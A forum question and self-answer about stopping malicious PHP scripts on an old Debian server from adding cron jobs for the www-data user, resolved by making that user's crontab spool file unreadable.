disable cron for "www-data" user

Question

My old debian server is running php as dso and some malicious scripts are always adding cron for system user "www-data". I could see too many malicious crons getting added for this user some how. As the server is running php as dso, we are unable to track the exact process adding the cron.

Q. How can i disable "www-data" from adding crons further. like disabling entire cron mechanism for the user? Is that possible?

Q. How can we find which php script does this cron edit?

I could see the below in cron documentation.

"at.allow and at.deny"

You can also use the /etc/at.allow and /etc/at.deny files to manage who can schedule jobs with at.

The /etc/at.allow file can contain a list of users that are allowed to schedule at jobs. When /etc/at.allow does not exist, then everyone can use at unless their username is listed in /etc/at.deny.

There is /etc/at.deny file and "www-data" is there meanwhile it still can execute crons

Answer 1

Finally I have found a solution of my own adjusted cron settings for the apache user in such a way that "www-data" user is not able to add cron any more.

touch /var/spool/cron/crontabs/www-data; chmod 0 /var/spool/cron/crontabs/www-data

Below is the result of the above adjustments.

su www-data
$ 
$ crontab -e
crontabs/www-data/: fdopen: Permission denied$